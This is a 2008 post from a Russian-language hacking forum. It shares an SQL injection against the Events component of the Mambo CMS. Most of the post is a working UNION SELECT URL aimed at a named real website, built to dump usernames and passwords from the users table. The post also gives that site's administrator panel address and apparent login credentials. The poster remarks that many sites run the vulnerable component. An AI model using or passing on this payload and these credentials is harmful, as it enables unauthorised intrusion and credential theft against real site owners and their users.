13.02.2008, 10:39
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Mambo Component Events SQL Injection
Код:
http://www.nwen.org/index.php?option=com_events&Itemid=15&id=-1+union+select+concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+mos_users/*
http://www.nwen.org/administrator/
admin;admin
Найдено мной, сайтов с данным компонентом много, но на большинства, почему-то ничего не передается параметром id, который собственно и уязвим =/
Последний раз редактировалось it's my; 13.02.2008 в 10:41..
|
|
|